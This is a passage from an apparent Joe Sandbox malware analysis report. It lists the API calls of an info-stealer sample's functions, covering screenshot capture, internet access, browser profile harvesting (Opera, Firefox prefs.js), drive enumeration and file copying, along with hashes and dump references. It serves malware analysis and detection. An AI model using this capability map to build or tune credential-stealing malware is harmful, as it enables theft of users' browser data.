                                                                                                                                                                    • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                                                                    • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                                                                    • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                      • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                      • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                                                                    • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2610876673-0
                                                                                                                                                                    • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                    • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                                                                    • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                    • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                                                                    Function 00401D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                                                                      • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                    • API String ID: 1475085387-1173974218
                                                                                                                                                                    • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                    • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                                                                    Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • wsprintfA.USER32 ref: 0041546A
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                    • String ID: %s\%s
                                                                                                                                                                    • API String ID: 1150833511-4073750446
                                                                                                                                                                    • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                    • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                    • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                                                                    Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                    • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                    • API String ID: 2567437900-1710495004
                                                                                                                                                                    • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                                    • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                                                                    • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                                                                    Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                                                                    • _memset.LIBCMT ref: 004151E5
                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                                                                      • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                                      • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                                      • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                                                                      • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                                                                      • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                                      • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                                      • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                                      • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                                      • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                                      • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                                                                      • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                    • API String ID: 441469471-147700698
                                                                                                                                                                    • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                                    • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                                                                    • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                                                                    Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                    • String ID: prefs.js
                                                                                                                                                                    • API String ID: 893096357-3783873740
                                                                                                                                                                    • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                    • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                                                                    • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                    • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                                                                    Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
